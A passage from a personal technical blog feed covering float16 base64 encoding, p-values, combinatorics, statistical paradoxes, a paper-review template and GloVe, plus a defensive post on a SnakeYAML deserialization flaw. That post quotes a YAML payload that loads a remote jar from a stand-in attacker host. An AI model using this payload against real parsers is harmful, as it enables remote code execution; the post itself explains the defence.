<span id="cb3-15"><a aria-hidden="true" href="#cb3-15" tabindex="-1"></a>    b64_emb <span class="op">=</span> convert_f16_to_b64_m2(<span class="bu">list</span>(arr))</span>
<span id="cb3-16"><a aria-hidden="true" href="#cb3-16" tabindex="-1"></a>    <span class="cf">assert</span>(np.isclose(arr, convert_b64_to_f16(b64_emb), atol<span class="op">=</span><span class="fl">1e-2</span>).<span class="bu">all</span>())</span></code></pre></div>
<h3 id="method-3---using-dtype-indicator">Method 3 - using dtype
indicator</h3>
<p>Based on the method described at <a href="https://numpy.org/doc/stable/reference/arrays.dtypes.html">arrays.dtypes.html</a>,
<code><f2</code> is supposed to be faster than struct.</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a><span class="kw">def</span> convert_f16_to_b64_m3(arr):</span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> <span class="co"># using f2 is faster</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> a <span class="op">=</span> np.array(arr, dtype<span class="op">=</span>np.dtype(<span class="st">'<f2'</span>))</span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> <span class="cf">return</span> base64.b64encode(a.tobytes())</span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a></span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a><span class="kw">def</span> verify_f16_encoding_m3():</span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a> arr <span class="op">=</span> np.random.normal(<span class="dv">0</span>, <span class="fl">0.01</span>, <span class="dv">96</span>).astype(<span class="st">'float16'</span>)</span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> b64_emb <span class="op">=</span> convert_f16_to_b64_m3(<span class="bu">list</span>(arr))</span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a> <span class="cf">assert</span>(np.isclose(arr, convert_b64_to_f16(b64_emb), atol<span class="op">=</span><span class="fl">1e-5</span>).<span class="bu">all</span>())</span></code></pre></div>
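<p>The tests above compare with a tolerance because the inputs start out at higher precision. As a small sketch of where the rounding actually happens, the following standard-library example (the helper names <code>f16_to_b64</code> and <code>b64_to_f16</code> and the sample values are hypothetical) shows that values are rounded once when they are cast to float16, and that the base64 round trip after that point is exact.</p>

```python
import base64
import struct


def f16_to_b64(values):
    """Pack values as little-endian float16 ("e") and base64-encode the bytes."""
    return base64.b64encode(struct.pack(f"<{len(values)}e", *values)).decode("utf-8")


def b64_to_f16(s):
    """Decode base64 and unpack the bytes as little-endian float16 values."""
    raw = base64.b64decode(s)
    return list(struct.unpack(f"<{len(raw) // 2}e", raw))


original = [1.2345, -0.001, 3.14159, 0.5]   # made-up sample values
once = b64_to_f16(f16_to_b64(original))     # rounded to float16 precision
twice = b64_to_f16(f16_to_b64(once))        # a second round trip changes nothing

assert once == twice                        # lossless once values are float16
assert once != original                     # the only loss is the float16 cast
print(len(base64.b64decode(f16_to_b64(original))), "bytes for", len(original), "values")
```

<p>Each value occupies two bytes before encoding, half of what float32 needs, and base64 then adds roughly one third on top of the raw byte size.</p>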
<h3 id="conclusion">Conclusion</h3>
<p>The same can be achieved using <a href="https://stackoverflow.com/questions/6162651/half-precision-floating-point-in-java">Java/Scala</a>
as well.</p>
<h3 id="citation">Citation</h3>
<p>To refer to this post, please cite it as:</p>
<pre><code>Float16 precision conversion to Base64 for lossless transmission | Senthilkumar Gopal.
https://sengopal.github.io/posts/float16-precision-conversion-to-base64.html</code></pre>review-of-p-value2023-01-12T00:00:00-08:002023-01-12T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2023-01-12:/posts/review-of-p-value.htmlThis post describes a review of the basics regarding p-value<p>p-value is one of the most commonly used statistical test and value
used for experimentation. A common misreading is that the p-value is the
probability that the null hypothesis is true. The standard definition is
that the p-value <strong>is the probability of observing data at least
as extreme as what was actually observed, assuming that the null
hypothesis is true.</strong> In other words, in a world (created with
math equations) where the null hypothesis holds, the p-value shows how
consistent the data is with that hypothesis. So a low p-value ridicules
the null hypothesis, while a large p-value gives no reason to change the
default action based on the null hypothesis.</p>
<h3 id="drug-test">Drug Test</h3>
<p>Using [1] as reference, in a Drug test between A and B, the null
hypothesis is that both Drugs A and B are the same. So a low p-value
suggests that these two drugs are different, which is evidence against
the null hypothesis. Typically a p-value of 0.05 is used as a threshold,
though this is arbitrary. A threshold of 0.05 means that if the null
hypothesis were true and both drugs were the same, only about 5% of
repeated runs of the experiment would show a difference this large
purely by chance.</p>
<ul>
<li>Null Hypothesis: The drugs are the same and patients react the same
way</li>
<li>Alternate Hypothesis: The drugs are dissimilar and cure the disease
to varying degrees</li>
</ul>
<h3 id="computing-p-value">Computing p-value</h3>
<p>As referenced from [2], a different test is conducted where the same
drug A is given to two different groups.</p>
<ul>
<li>Null Hypothesis: There is no real difference between the two groups,
since both receive the same drug</li>
<li>Alternate Hypothesis: The two groups react differently</li>
</ul>
<p>Under the null hypothesis, the p-value would usually be high, as the
assumption is that both groups have been given the same drug and are
getting cured, and hence there are no real differences between these two
groups. Most runs would give a high p-value, consistent with the effect
of drug A being the same in both groups.</p>
<p>But due to pure random effect, if the p-value of two groups having
the same drug is small, say p=0.01, then it is a False Positive: the
experiment appears to reject the null hypothesis even though, for this
particular round, the null hypothesis is actually true.</p>
<p>So with multiple experiments “A p=0.05 threshold means that 5% of the
experiments, where the differences come from random things, will
generate a p-value < 0.05”</p>
<p>Using this statement, for the test with Drug A vs Drug B, a p-value
below 0.05 would lead us to conclude that Drug A is different from
Drug B, while accepting that the different reactions might be just
random, i.e., we allow about 5 False Positives in 100 experiment runs in
which the drugs are actually the same. A p-value above the threshold
means we fail to reject the null hypothesis; it does not prove that the
null hypothesis is true. Hence it is important to determine this
threshold before running the experiments to prevent being biased by the
generated data.</p>
<p>For a stricter threshold, p=0.0001 might be used as well, where only
1 false positive is allowed in 10,000 experiments.</p>
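<p>The false positive rate described above can be checked with a small
simulation. This is a minimal sketch, not the method from the referenced
videos: the function names, the group size and the use of a two-sample
z-test with a known standard deviation are all assumptions made for
illustration. Both groups are drawn from the same distribution, so every
p-value below the threshold is a false positive.</p>

```python
import math
import random


def two_sided_p_value(group_a, group_b, sigma=1.0):
    """Two-sample z-test p-value, assuming a known standard deviation sigma."""
    n_a, n_b = len(group_a), len(group_b)
    diff = sum(group_a) / n_a - sum(group_b) / n_b
    std_err = sigma * math.sqrt(1.0 / n_a + 1.0 / n_b)
    z = diff / std_err
    # P(|Z| >= |z|) for a standard normal Z
    return math.erfc(abs(z) / math.sqrt(2.0))


def false_positive_rate(threshold=0.05, runs=4000, group_size=20, seed=0):
    """Fraction of same-drug experiments whose p-value falls below threshold."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(runs):
        # Both groups receive the same drug: same distribution, no real effect.
        group_a = [rng.gauss(0.0, 1.0) for _ in range(group_size)]
        group_b = [rng.gauss(0.0, 1.0) for _ in range(group_size)]
        if two_sided_p_value(group_a, group_b) < threshold:
            hits += 1
    return hits / runs


# The printed rate is expected to land close to the chosen threshold.
print(false_positive_rate(threshold=0.05))
```

<p>Lowering the threshold argument lowers the share of false positives
in the same proportion, which is the trade-off behind stricter
thresholds.</p>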
<h3 id="compute-the-difference">Compute the difference</h3>
<p>Though a p-value helps decide whether to reject the null hypothesis,
it does not provide a mechanism to determine how dissimilar the drugs
are. It is important to remember that the p-value measures how
compatible the data is with the null hypothesis, but not the scale of
difference between the candidates of the experiment.</p>
<p>References (1) <a href="https://www.youtube.com/watch?v=vemZtEM63GY&list=WL&index=93">StatQuest</a>
(2) <a href="https://www.youtube.com/watch?v=JQc3yx0-Q9E">StatQuest</a></p>Review of Combinatorics2023-01-03T00:00:00-08:002023-01-03T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2023-01-03:/posts/review-of-combinatorics.htmlThis post reviews the basics of combinatorics and specifically the difference between permutations, variations and combinations.<p>In the study of combinatorics, there are three different structures -
<strong>permutations, variations and combinations</strong> which are
closely related, with subtle differences.</p>
<h2 id="permutation">Permutation</h2>
<p>A typical question for permutation is “How many ways to arrange the
three characters a, b and c?”. Note that position and order matter
for a permutation, and all the positions must be filled. A permutation
defines the number of different possible ways we can arrange a set of
elements and always <strong>arranges the entire set of elements in the
sample space</strong>. Example: For a relay race, we can arrange
4-runners already chosen in 4-positions using permutations.</p>
<blockquote>
<p>Permutations are arrangements of objects (with or without
repetition), the order does matter.</p>
</blockquote>
<p>Permutations without repetition apply when all <em>n</em> elements
are arranged, order matters, and no element is repeated.</p>
<p><span class="math display"><em>P</em><sub><em>n</em></sub> = <em>n</em>!</span></p>
<p>Permutations with repetition apply when all <em>n</em> elements are
arranged, order matters, and some elements repeat <em>a</em>,
<em>b</em>, <em>c</em>, ... times.</p>
<p><span class="math display">$$
P^{a,b,c,\ldots}_{n} = \frac{n!}{a! \cdot b! \cdot c! \cdots}
$$</span></p>
<h3 id="examples-of-permutations">Examples of Permutations</h3>
<ul>
<li>Ways to put N items in a specific order.</li>
<li>Different strings that can be built using the 26 letters of the
alphabet such that each letter is used exactly once in a single
string.</li>
<li>Order in which N people can enter a door</li>
</ul>
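<p>The two permutation formulas can be sketched with the Python standard
library. The helper names below are made up for this illustration; only
<code>math.factorial</code> and <code>itertools.permutations</code> are
library calls.</p>

```python
import math
from itertools import permutations


def count_permutations(n):
    """Permutations without repetition of n distinct elements: n!"""
    return math.factorial(n)


def count_permutations_with_repetition(counts):
    """Arrangements of a multiset; counts holds how often each element repeats."""
    total = math.factorial(sum(counts))
    for c in counts:
        total //= math.factorial(c)
    return total


# Arranging the three characters a, b and c
print(count_permutations(3))                        # 6
print(len(list(permutations("abc"))))               # 6, by brute-force enumeration
# Distinct arrangements of the letters a, a, b (a repeats twice)
print(count_permutations_with_repetition([2, 1]))   # 3
```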
<h2 id="variations-extension-of-permutation">Variations (extension of
permutation)</h2>
<p>Variations can be considered an extension of permutations, where
variations determine the total number of ways we can pick and arrange
some elements of a given set, with or without repetitions. Using the
relay race example from above, if we had to choose 4-runners out of
6-runners in the team (6-runners | 4-positions), and then decide who
runs in which lap (<strong>pick &amp; arrange</strong>), we would
require using Variations.</p>
<blockquote>
<p>Variations are arrangements of selections of objects, where the order
of the selected objects matters.</p>
</blockquote>
<p>Variations without repetition apply when only <em>n</em> of the
<em>m</em> elements are used, order matters, and no element is
repeated.</p>
<p><span class="math display">$$
V^n_{m} = \frac{m!}{(m - n)!}
$$</span></p>
<p>Variations with repetition apply when order matters and elements may
be repeated. Not all elements are used if <em>m</em> &gt; <em>n</em>,
while all elements can be used if <em>m</em> ≤ <em>n</em>.</p>
<p><span class="math display"><em>V</em><sub><em>m</em></sub><sup><em>n</em></sup> = <em>m</em><sup><em>n</em></sup></span></p>
<h3 id="examples-of-variations">Examples of Variations</h3>
<ul>
<li>Ways, in which 3 out of 10 sports people can win a medal in a
competition, the first winning gold, the next silver, and the third
bronze.</li>
<li>Possibilities to choose 2 representatives out of 100 students, one
as the “president” and the other as the “vice-president”.</li>
<li>Different results when rolling 3 dice which are distinguishable by
color, e.g. white, red, and black dice.</li>
</ul>
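<p>As a rough check of the variation formulas against the examples
above, the counts can be computed directly. The function names are
hypothetical; <code>math.perm</code> needs Python 3.8 or later.</p>

```python
import math
from itertools import permutations, product


def variations(m, n):
    """Ordered selections of n out of m elements without repetition: m! / (m - n)!"""
    return math.perm(m, n)


def variations_with_repetition(m, n):
    """Ordered selections of n out of m elements with repetition: m ** n"""
    return m ** n


print(variations(10, 3))                 # 720 gold/silver/bronze outcomes
print(variations(100, 2))                # 9900 president/vice-president pairs
print(variations_with_repetition(6, 3))  # 216 results for 3 distinguishable dice
print(variations(6, 4))                  # 360 relay line-ups from 6 runners
```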
<h2 id="combinations">Combinations</h2>
<p>Combinations count the number of different ways we can pick some
elements of a set where the order in which the elements are selected is
not important. Using the example of the relay race, if we only care about
which 4-runners out of 6-runners made it into the team
(<strong>pick</strong>) without any dependency on their position, we
would be dealing with combinations and order is not relevant.</p>
<blockquote>
<p>Combinations are selections of objects, with or without repetition,
the order does not matter.</p>
</blockquote>
<p>Combinations without repetition apply when only <em>n</em> of the
<em>m</em> elements are picked, order does not matter, and
<strong>elements are not repeated.</strong></p>
<p><span class="math display">$$
C^n_{m} = \frac{m!}{n! \cdot (m - n)!}
$$</span></p>
<p>Combinations with repetition apply when <em>n</em> elements are
picked from <em>m</em>, order does not matter, and <strong>elements may
be repeated.</strong></p>
<p><span class="math display">$$
C^n_{m} = \frac{(m + n - 1)!}{n! \cdot (m - 1)!}
$$</span></p>
<h3 id="examples-of-combinations">Examples of Combinations</h3>
<ul>
<li>Ways, in which 3 out of 10 sports people can win a medal in a
competition (no matter whether gold, silver, or bronze).</li>
<li>Possibilities to choose 2 representatives out of 100 students,
irrespective of the role.</li>
<li>Different results when rolling 3 identical dice, irrespective of the
order.</li>
</ul>
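<p>The combination formulas can be checked the same way. Again the
helper names are only illustrative; <code>math.comb</code> (Python 3.8
or later) does the counting, and the brute-force enumeration is there to
confirm the with-repetition formula for three identical dice.</p>

```python
import math
from itertools import combinations_with_replacement


def combinations(m, n):
    """Unordered selections of n out of m elements without repetition."""
    return math.comb(m, n)


def combinations_with_repetition(m, n):
    """Unordered selections of n out of m elements with repetition allowed."""
    return math.comb(m + n - 1, n)


print(combinations(10, 3))                 # 120 sets of medal winners
print(combinations(100, 2))                # 4950 pairs of representatives
print(combinations_with_repetition(6, 3))  # 56 results for 3 identical dice
print(combinations(6, 4))                  # 15 relay teams from 6 runners

# Brute-force enumeration of the dice results as a cross-check
dice_results = list(combinations_with_replacement(range(1, 7), 3))
print(len(dice_results))                   # 56
```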
<h2 id="references">References</h2>
<ol type="1">
<li><a href="https://betterexplained.com/articles/easy-permutations-and-combinations/">Better
Explained</a></li>
<li><a href="https://www.bookofproofs.org/branches/permutations-combinations-variations/">Book
of Proofs</a></li>
<li><a href="https://www.quora.com/What-is-the-difference-between-variation-combination-and-permutations">Quora</a></li>
</ol>Scientific paper review template2022-11-16T00:00:00-08:002022-11-16T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2022-11-16:/posts/scientific-paper-review-template.htmlA template to capture notes and reviews of scientific research papers<p>Using some commonly available standards [1] and word of the crowd
[2], following is a rough template of how to review a research paper and
collect notes for future references.</p>
<h3 id="first-pass">First Pass</h3>
<p>The first pass is to review the usefulness of the paper using its
<strong>Title</strong>, <strong>Abstract</strong>, and
<strong>Figures</strong> (at least the key figures of the paper,
primarily Figures 1 and 2).</p>
<h3 id="second-pass">Second Pass</h3>
<p>As part of the second pass, review the <strong>Introduction</strong>,
<strong>Conclusion</strong>, and the <strong>Figures</strong> carefully
again and skim the rest. The intent of this pass is to create a
<strong>Summary</strong> which captures the purpose of the paper and if
possible what <strong>major questions</strong> are being answered.</p>
<h3 id="third-pass">Third Pass</h3>
<p>Review the <strong>Related Work</strong> section if this paper needs
a more in-depth analysis or answers one of the open problems that we are
actively working on. We should attempt to identify the paper
implementation code and the data used. The potential locations are
<strong>Paperswithcode</strong>, <strong>Github</strong>,
<strong>Huggingface</strong> or <strong>Kaggle</strong> and also review
blogs for more concise explanations and examples.</p>
<h3 id="checkpoint---note-summary">Checkpoint - Note summary</h3>
<p>The below is necessary for all papers being reviewed to make any
decision on further introspection or file them away for future
exploration.</p>
<ol type="1">
<li><strong>Abstract:</strong> - problem | relevancy | solution |
summary | objective | novelty | keywords</li>
<li><strong>Figure 1</strong> - visual summary of the main idea</li>
<li><strong>Intro</strong> - relevancy | problem defn | solution</li>
<li><strong>Conclusion:</strong> main outcome | future work</li>
<li><strong>Data:</strong> dataset used for results, training,
metrics</li>
<li><strong>Tasks:</strong> Planned tasks or objectives</li>
<li><strong>Results:</strong> baseline | benchmarks | improvements |
comparison to other famous models</li>
<li><strong>Utility:</strong> application for our problem</li>
<li><strong>Future:</strong> Potential improvements identified in the
paper or that we can think of.</li>
</ol>
<h3 id="fourth-pass-implementation-review">Fourth Pass [Implementation
Review]</h3>
<p>Do this only for papers you would like to replicate/improve</p>
<ul>
<li><strong>Model Architecture:</strong> Architecture description layers
used and network structure</li>
<li><strong>Inputs & Outputs:</strong> Inputs | Outputs whether it
is a probability, segmentation map, bounding boxes, and so on</li>
<li><strong>New or novel layers:</strong> new techniques or layers |
code or the implementation probably focus on these novel layers</li>
<li><strong>Loss calculation:</strong> mathematical formula for how the
loss was calculated | on what basis it was chosen</li>
<li><strong>Model Training:</strong> hyperparameters used, the batch
size, and the model configurations</li>
<li><strong>Know what you did not understand</strong> - Highlight the
points you did not understand | find references and resources that can
help you</li>
</ul>
<h3 id="fifth-pass-replication">Fifth Pass [Replication]</h3>
<p>Train the model on the paper data if it is available and try to
replicate the results if it is possible. If not possible, apply the
model on just a subset of the data or just for one epoch to make sure
that the implemented model is working as expected and then you can apply
it to your data.</p>
<h3 id="sixth-pass-adoption">Sixth Pass [Adoption]</h3>
<p>Apply the same model as in the paper without any modifications to any
other data set and capture the results. Attempt to modify or generalize
it for the paper dataset and observe its results. Capture why it works
or does not work, and what issues we run into.</p>
<p>The below is necessary for all papers being replicated and adapted.</p>
<ul>
<li><strong>Model Modifications:</strong> modifications, hyperparameters
used, the batch size, and the model configurations</li>
<li><strong>Techniques</strong> - Highlight the problems and techniques
applied to fix them</li>
</ul>
<h4 id="references">References</h4>
<p>[1] Stanford CS230: Deep Learning | Autumn 2018 | Lecture 8 - Career
Advice / Reading Research Papers. www.youtube.com,
https://www.youtube.com/watch?v=733m6qBH-jI. Accessed 26 Nov. 2022.</p>
<p>[2] Hosni, Youssef. “How to Read Machine Learning Papers
Effectively.” Medium, 9 Oct. 2022,
https://pub.towardsai.net/how-to-read-machine-learning-papers-effectively-9c2df7906516.</p>Paradoxes in statistics2022-06-04T00:00:00-07:002022-06-04T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-06-04:/posts/paradoxes-in-statistics.htmlThis post describes some of the well known paradoxes in statistics<p>Came across this <a href="https://twitter.com/maartenvsmeden/status/1356147552362639366">tweet</a>
about statistical paradoxes and wanted to learn what they mean.</p>
<h3 id="absence-of-evidence-fallacy">Absence of evidence fallacy</h3>
<p>The absence of evidence fallacy occurs when someone uses a lack of
evidence to try to “prove” something. Of course, the problem with this
line of reasoning is that a lack of evidence is just that: a lack.
Evidence of absence is evidence of any kind that suggests something is
missing or that it does not exist.</p>
<p><a href="https://en.wikipedia.org/wiki/Evidence_of_absence">Reference</a></p>
<h3 id="ecological-fallacy">Ecological fallacy</h3>
<p>A mistake caused by assuming what is true for a group is true for the
individual members of the group. In statistical analysis, it is an
error caused by inferring that a pattern in aggregate data remains true
at the individual level.</p>
<p><a href="https://sociologydictionary.org/ecological-fallacy/">Reference</a></p>
<h3 id="steins-paradox">Stein’s paradox</h3>
<p>Stein’s example (or phenomenon or paradox), in decision theory and
estimation theory, is the phenomenon that when three or more parameters
are estimated simultaneously, there exist combined estimators more
accurate on average (that is, having lower expected mean squared error)
than any method that handles the parameters separately.</p>
<p><a href="https://en.wikipedia.org/wiki/Stein%27s_example">Reference</a></p>
<h3 id="lords-paradox">Lord’s paradox</h3>
<p>When two groups are compared in a pre-post study, two different
conclusions can be drawn between the two-sample t-test and the analysis
of covariance (ANCOVA). It is known as Lord’s Paradox, and it occurs
because the parameter in the two-sample t-test and the parameter of
interest in the ANCOVA model are not the same quantity. The difference
between the two parameters can be explained by the covariance of
linearly combined random variables which is an important topic in
introductory statistical theory courses.</p>
<p><a href="https://www.ccsenet.org/journal/index.php/ijsp/article/view/75051">Reference</a></p>
<h3 id="simpsons-paradox">Simpson’s paradox</h3>
<p>Simpson’s paradox, which also goes by several other names, is a
phenomenon in probability and statistics in which a trend appears in
several groups of data but disappears or reverses when the groups are
combined. This result is often encountered in social-science and
medical-science statistics, and is particularly problematic
when frequency data is unduly given causal interpretations.</p>
<p><a href="https://en.wikipedia.org/wiki/Simpson%27s_paradox">Reference</a></p>
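<p>A small numeric sketch makes the reversal concrete. The counts below
are the ones commonly quoted from a kidney stone treatment study and are
not from this post; treat them as an illustrative assumption. Treatment
A has the higher success rate in each subgroup, yet treatment B looks
better once the subgroups are combined, because A was mostly given to
the harder (large stone) cases.</p>

```python
# (successes, patients) per treatment and stone size; illustrative figures
results = {
    "A": {"small": (81, 87), "large": (192, 263)},
    "B": {"small": (234, 270), "large": (55, 80)},
}


def rate(successes, patients):
    """Success rate for one group."""
    return successes / patients


def overall(treatment):
    """Success rate for a treatment after combining its subgroups."""
    successes = sum(s for s, _ in results[treatment].values())
    patients = sum(p for _, p in results[treatment].values())
    return successes / patients


for size in ("small", "large"):
    a = rate(*results["A"][size])
    b = rate(*results["B"][size])
    print(f"{size} stones: A={a:.2f} B={b:.2f}")
print(f"combined: A={overall('A'):.2f} B={overall('B'):.2f}")
```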
<h3 id="berksons-paradox">Berkson’s paradox</h3>
<p>Berkson’s paradox (also known as Berkson’s fallacy or Berkson’s bias)
is the counter-intuitive idea that events which seem to be correlated
actually are not. Take two events, A and B, which are completely
independent events (for example, lung cancer and diabetes). If a study
selects for both the presence of A (lung cancer) and B (diabetes), the
presence of diabetes will make the presence of lung cancer more likely.
Intuitively, this makes no sense, but the data seems to back this
counter-intuitive notion up, showing that there is, in fact, a
connection.</p>
<p><a href="https://www.statisticshowto.com/berksons-paradox-definition/">Reference</a></p>
<h3 id="prosecutors-fallacy">Prosecutor’s fallacy</h3>
<p><em>tbd</em></p>
<h3 id="gamblers-fallacy">Gambler’s fallacy</h3>
<p>The gambler’s fallacy is the belief that the probability for an
outcome after a series of outcomes is not the same as the probability
for a single outcome. This belief is a genuine fallacy in cases
where the events in question are independent and identically
distributed, since past outcomes then carry no information about the
next one.</p>
<p><a href="https://www.tandfonline.com/doi/abs/10.1080/13669877.2017.1378248?journalCode=rjrr20">Reference</a></p>
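<p>For independent fair coin flips this can be checked by simulation.
The sketch below is an illustration under assumed parameters (a fair
coin, a streak of three heads, a fixed seed) and estimates how often
heads follows a run of heads.</p>

```python
import random


def heads_rate_after_streak(flips=200_000, streak=3, seed=0):
    """Estimate P(heads) on the flip that follows `streak` heads in a row."""
    rng = random.Random(seed)
    run = 0          # current number of consecutive heads
    followups = 0    # flips observed right after a streak
    heads_after = 0  # how many of those flips were heads
    for _ in range(flips):
        heads = rng.random() < 0.5
        if run >= streak:
            followups += 1
            heads_after += heads
        run = run + 1 if heads else 0
    return heads_after / followups


# Expected to stay close to 0.5: the streak does not change the odds.
print(heads_rate_after_streak())
```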
<h3 id="lindleys-paradox">Lindley’s paradox</h3>
<p>Lindley’s paradox is a counterintuitive situation in statistics in
which the Bayesian and frequentist approaches to a hypothesis testing
problem give different results for certain choices of the prior
distribution. It is in fact a difficulty reconciling two paradigms —
Bayesian and frequentist statistics.</p>
<ul>
<li>Bayes — probability is a (unique) measure of degree of belief (see
e.g., Cox’s theorem in Chap. 2 of Jaynes)</li>
<li>Frequentist — probability is the (asymptotic) frequency at which an
outcome occurs, in a hypothetical sequence of repeated trials</li>
</ul>
<p><a href="https://andrewfowlie.github.io/talks/jl-paradox.pdf">Reference</a>
| <a href="https://en.wikipedia.org/wiki/Lindley%27s_paradox">Reference</a></p>
<h3 id="low-birthweight-paradox">Low birthweight paradox</h3>
<p>The low birth-weight paradox is an apparently paradoxical observation
relating to the birth weights and mortality rate of children born to
tobacco smoking mothers. Low birth-weight children born to smoking
mothers have a lower infant mortality rate than the low birth weight
children of non-smokers. It is an example of Simpson’s paradox.
Traditionally, babies weighing less than a certain amount (which varies
between countries) have been classified as having low birth weight. In a
given population, low birth weight babies have a significantly higher
mortality rate than others; thus, populations with a higher rate of low
birth weights typically also have higher rates of child mortality than
other populations.</p>
<p><a href="https://en.wikipedia.org/wiki/Low_birth-weight_paradox">Reference</a></p>Secure Constructor object for SnakeYAML2022-04-19T00:00:00-07:002022-04-19T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-04-19:/posts/secure-constructor-object-for-snakeyaml.htmlThis post explores the pitfalls and steps to securely read an YAML file using SnakeYAML library<p>We use <a href="https://bitbucket.org/snakeyaml/snakeyaml/src/master/">SnakeYAML</a>
for simple parsing of YAML files in Java, as part of <a href="https://github.com/eBay/ebay-oauth-java-client">ebay-oauth-java-client</a>
configuration. We were made aware of a vulnerability within the code due
to the usage of <code>Yaml yaml = new Yaml()</code> and then following
it with <code>yaml.loadAs(fis, Map.class);</code>. This issue was first
reported as part of <a href="https://github.com/kubernetes-client/java/issues/1698">Kubernetes
java client</a>, but affects any code which uses SnakeYaml for reading
generic types.</p>
<p>Yaml allows a class type to be tagged in the file using its name such
as <code>!!java.net.URLClassLoader</code>. So when
<code>yaml.loadAs</code> loads the file, it instantiates objects for the
tagged classes in the file. SnakeYAML recommends addressing this issue
using <a href="https://bitbucket.org/snakeyaml/snakeyaml/wiki/Documentation#markdown-header-type-safe-collections">type-safe-collections</a>
where the object types are defined and a <code>Constructor</code> object
is used to allow only specific types such as below. <a href="https://bitbucket.org/snakeyaml/snakeyaml/wiki/Documentation#markdown-header-type-safe-collections">Reference</a></p>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="bu">Constructor</span> constructor <span class="op">=</span> <span class="kw">new</span> <span class="bu">Constructor</span><span class="op">(</span>Car<span class="op">.</span><span class="fu">class</span><span class="op">);</span><span class="co">//Car.class is root</span></span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a>TypeDescription carDescription <span class="op">=</span> <span class="kw">new</span> <span class="fu">TypeDescription</span><span class="op">(</span>Car<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a>carDescription<span class="op">.</span><span class="fu">putListPropertyType</span><span class="op">(</span><span class="st">"wheels"</span><span class="op">,</span> Wheel<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a>constructor<span class="op">.</span><span class="fu">addTypeDescription</span><span class="op">(</span>carDescription<span class="op">);</span></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a>Yaml yaml <span class="op">=</span> <span class="kw">new</span> <span class="fu">Yaml</span><span class="op">(</span>constructor<span class="op">);</span></span></code></pre></div>
<p>However, this does not work for generic types such as
<code>java.util.Map</code> objects and such generic types are handled
specifically within SnakeYAML using <code>tag:map</code> or
<code>tag:sequence</code> for lists.</p>
<h3 id="how-does-this-work">How does this work</h3>
<p>The specifics of this issue are described in <a href="https://j0vsec.com/post/cve-2021-25738/">detail</a> by the
original reporter. When the config file contains
<code>some_var: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker-server.tld/poc.jar"]]]]</code>,
the default Constructor loads the ScriptEngineManager, which attempts to
load the jar from the remote location and execute it.</p>
<h3 id="how-to-address-this">How to address this</h3>
<p>The YAML specification defines a <a href="http://blogs.perl.org/users/tinita/2018/01/introduction-to-yaml-schemas-and-tags.html">FailSafe
Schema</a> which allows only <code>str</code>, <code>sequence</code> and
<code>map</code> and prevents all other types from even being
instantiated. SnakeYaml follows this fail-safe schema using <a href="https://javadoc.io/static/org.yaml/snakeyaml/1.25/org/yaml/snakeyaml/constructor/SafeConstructor.html">SafeConstructor</a>.
Using the SafeConstructor to create
<code>Yaml yaml = new Yaml(new SafeConstructor());</code> prevents any
arbitrary class from getting loaded. For specific types, using
<code>TypeDescription</code> and adding it to the constructor object as
shown above ensures only the allowed types are instantiated.</p>
<h3 id="how-does-this-look">How does this look</h3>
<p>The below is an inside look at all the allowed types using the
default <code>new Constructor()</code>; the
<code>yamlClassConstructors</code> has the <code>scalar</code> and
<code>sequence</code> classes which allow the arbitrary class
instantiation.</p>
<p><img src="/extras/images/snakeyaml/regular_constructor_sequence_tag.png"/></p>
<p>However, once the <code>new Constructor()</code> is substituted with
<code>new SafeConstructor()</code>, the arbitrary code will fail with
the following error confirming that the issue has been addressed.</p>
<p><img alt="drawing" src="/extras/images/snakeyaml/safe_constructor_error.png" width="950"/></p>NLP Glove Algorithm and further improvements on representation2022-04-10T00:00:00-07:002022-04-10T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-04-10:/posts/nlp-glove-algorithm-and-further-improvements-on-representation.htmlA post detailing about the Glove algorithm, its variations and utilities and further improvements on word representation<p>This lecture introduces the GloVe model, the intuition behind the
algorithm and different means to evaluate it.</p>
<p>GloVe is an algorithm for word vectors that was made by Jeffrey
Pennington, Richard Socher, and Christopher Manning in 2014. It acted as
the starting point for connecting the linear algebra based
methods on co-occurrence matrices, like LSA and COALS, with models
like skip-gram, CBOW and others, which were iterative neural updating
algorithms. The earlier linear algebra methods had advantages in fast
training and efficient usage of statistics, but their results weren’t as
good, perhaps because of the disproportionate importance given to large
counts. Conversely, the neural models perform gradient updates on word
windows and so use statistics inefficiently compared to the
co-occurrence matrix, though they are easier to scale to a very large
corpus by trading time for space.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_count_prediction.png"/></p>
<p>The motivation was to use neural methods, which generated improved
performance on many tasks, and identify the properties necessary to
make analogies work, such as going from male to female (king to
queen), or going from a verb to its agent (truck to driver).</p>
<h3 id="analogies-and-meaning-components">Analogies and Meaning
components</h3>
<p>The intent behind the GloVe design was to represent the “meaning”
components as ratios of co-occurrence probabilities. As an example, the
below illustrates the spectrum from solid to gas as in physics. The word
